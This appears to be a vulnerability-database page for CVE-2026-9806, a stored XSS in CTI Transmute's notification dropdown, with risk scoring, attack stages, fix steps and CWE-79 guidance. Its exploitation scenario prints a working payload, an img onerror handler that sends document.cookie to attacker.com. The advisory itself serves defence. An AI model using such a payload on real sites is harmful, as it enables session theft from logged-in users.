CVE-2026-9806: CTI Transmute: stored XSS in notification panel

UNKNOWN
Published May 28, 2026
CISO Take

CTI Transmute (MISP's CTI format-conversion tool) contained a stored XSS flaw in its notification bell dropdown, where user-controlled convert names were injected into innerHTML without sanitization, enabling arbitrary JavaScript execution in any authenticated user's browser session. The practical risk is limited: the vulnerability existed only on a development branch and has been patched via commit cf42409 — production deployments using a released version were never exposed. With no CVSS score assigned, no public exploits, and no CISA KEV listing, exploitation likelihood in the wild is very low; however, teams sharing development instances among analysts should treat this as a session-hijacking risk against high-value threat intelligence users. Verify you are running the patched release and enforce a hard policy against deploying unvetted development branches to shared environments.

Sources: NVD GitHub Advisory ATLAS

What is the risk?

Low overall risk. The development-branch-only scope significantly constrains blast radius — production users of released CTI Transmute builds were not affected at any point. Stored XSS in an authenticated CTI platform still poses meaningful risk in dev/staging environments shared across threat analyst teams, where a single exploit could compromise sessions with access to sensitive intelligence data. No CVSS vector, no public exploit code, and no active exploitation evidence keep this in the informational-to-low tier.

How does the attack unfold?

Malicious Convert Creation
Attacker with convert-creation access crafts a convert name embedding an XSS payload (script tag or event handler), which is stored in the CTI Transmute backend.
AML.T0049
Notification Queued
The platform generates a notification referencing the malicious convert name, storing unsanitized HTML content in the notification bell queue for all relevant users.
Victim Triggers Execution
An authenticated analyst or CISO opens the notification panel, causing the browser to render the payload via innerHTML and execute the injected JavaScript in their session context.
AML.T0011
Session Exfiltration
Injected script silently transmits the victim's session cookie or performs unauthorized platform actions, granting the attacker full access to the CTI platform under the analyst's identity.
AML.T0025

How severe is it?

CVSS 3.1
N/A
EPSS
0.3%
chance of exploitation in 30 days
Higher than 17% of all CVEs
Exploitation Status
No known exploitation
Sophistication
Trivial

What should I do?

5 steps
  1. Upgrade to the patched release containing commit cf42409badc27b13d9bb644b9175aa7f27e11259 — this is the definitive fix.

  2. Enforce branch deployment policies: only tagged releases go to shared or production environments; dev branches stay local.

  3. Audit existing convert names for unexpected HTML or script content as a retrospective indicator of attempted exploitation.

  4. Validate that your CTI Transmute deployment includes a strong Content-Security-Policy header (script-src 'self'; default-src 'self') to limit XSS blast radius.

  5. If unable to patch immediately, restrict notification panel access to trusted-network users only.

What does CISA's SSVC say?

Decision Track
Exploitation none
Automatable No
Technical Impact partial

Source: CISA Vulnrichment (SSVC v2.0). Decision based on the CISA Coordinator decision tree.

How is it classified?

Which compliance frameworks are affected?

This CVE is relevant to:

ISO 42001
A.9.3 - AI System Security
NIST AI RMF
GOVERN-1.7 - Processes for Identifying and Managing AI Risks
OWASP LLM Top 10
LLM06 - Sensitive Information Disclosure

Frequently Asked Questions

What is CVE-2026-9806?

CTI Transmute (MISP's CTI format-conversion tool) contained a stored XSS flaw in its notification bell dropdown, where user-controlled convert names were injected into innerHTML without sanitization, enabling arbitrary JavaScript execution in any authenticated user's browser session. The practical risk is limited: the vulnerability existed only on a development branch and has been patched via commit cf42409 — production deployments using a released version were never exposed. With no CVSS score assigned, no public exploits, and no CISA KEV listing, exploitation likelihood in the wild is very low; however, teams sharing development instances among analysts should treat this as a session-hijacking risk against high-value threat intelligence users. Verify you are running the patched release and enforce a hard policy against deploying unvetted development branches to shared environments.

Is CVE-2026-9806 actively exploited?

No confirmed active exploitation of CVE-2026-9806 has been reported, but organizations should still patch proactively.

How to fix CVE-2026-9806?

1. Upgrade to the patched release containing commit cf42409badc27b13d9bb644b9175aa7f27e11259 — this is the definitive fix. 2. Enforce branch deployment policies: only tagged releases go to shared or production environments; dev branches stay local. 3. Audit existing convert names for unexpected HTML or script content as a retrospective indicator of attempted exploitation. 4. Validate that your CTI Transmute deployment includes a strong Content-Security-Policy header (script-src 'self'; default-src 'self') to limit XSS blast radius. 5. If unable to patch immediately, restrict notification panel access to trusted-network users only.

What systems are affected by CVE-2026-9806?

This vulnerability affects the following AI/ML architecture patterns: Threat intelligence platforms, CTI format conversion pipelines, AI-augmented SOC analyst workflows, Analyst-facing security tooling.

What is the CVSS score for CVE-2026-9806?

No CVSS score has been assigned yet.

What is the AI security impact?

Affected AI Architectures

Threat intelligence platformsCTI format conversion pipelinesAI-augmented SOC analyst workflowsAnalyst-facing security tooling

MITRE ATLAS Techniques

AML.T0011 User Execution
AML.T0025 Exfiltration via Cyber Means
AML.T0036 Data from Information Repositories
AML.T0049 Exploit Public-Facing Application

Compliance Controls Affected

ISO 42001: A.9.3
NIST AI RMF: GOVERN-1.7
OWASP LLM Top 10: LLM06

What are the technical details?

Original Advisory

A stored cross-site scripting (XSS) vulnerability exists in the notification panel of CTI Transmute in versions prior to the patched release. Notification messages containing user-controlled convert names were rendered in the notification bell dropdown using innerHTML without adequate sanitization. An attacker able to create or influence a convert name that is included in a notification could inject arbitrary JavaScript, which would execute in the browser of an authenticated user when they opened the notification panel. Successful exploitation could allow the attacker to perform actions in the victim's session or access information available to the application in the browser context. The issue was remediated by constructing notification elements through DOM methods and assigning notification message content via textContent instead of innerHTML. This vulnerability was only present on a development branch.

Exploitation Scenario

An attacker with convert-creation permissions in CTI Transmute — a malicious insider, a compromised service account, or an external actor who gained write access via a separate vulnerability — crafts a convert name containing a JavaScript payload such as `<img src=x onerror="fetch('https://attacker.com/?s='+btoa(document.cookie))">`. The platform stores this name and queues a notification. When a CISO or senior analyst opens the notification bell dropdown — a routine action during threat review — the payload silently executes, exfiltrating their session token to the attacker's server. The attacker replays the stolen token to access the full CTI platform as the victim, potentially poisoning threat intelligence feeds consumed by downstream AI enrichment pipelines.

Weaknesses (CWE)

CWE-79 — Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting'): The product does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users.

  • [Architecture and Design] Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid [REF-1482]. Examples of libraries and frameworks that make it easier to generate properly encoded output include Microsoft's Anti-XSS library, the OWASP ESAPI Encoding module, and Apache Wicket.
  • [Implementation, Architecture and Design] Understand the context in which your data will be used and the encoding that will be expected. This is especially important when transmitting data between different components, or when generating outputs that can contain multiple encodings at the same time, such as web pages or multi-part mail messages. Study all expected communication protocols and data representations to determine the required encoding strategies. For any data that will be output to another web page, especially any data that was received from external inputs, use the appropriate encoding on all non-alphanumeric characters. Parts of the same output document may require different encodings, which will vary depending on whether the output is in the: etc. Note that HTML Entity Encoding is only appropriate for the HTML body. Consult the XSS Prevention Cheat Sheet [REF-724] for more details on the types of encoding and escaping that are needed. HTML body Element attributes (such as src="XYZ") URIs JavaScript sections Casca

Source: MITRE CWE corpus.

Timeline

Published
May 28, 2026
Last Modified
June 17, 2026
First Seen
May 28, 2026

Related Vulnerabilities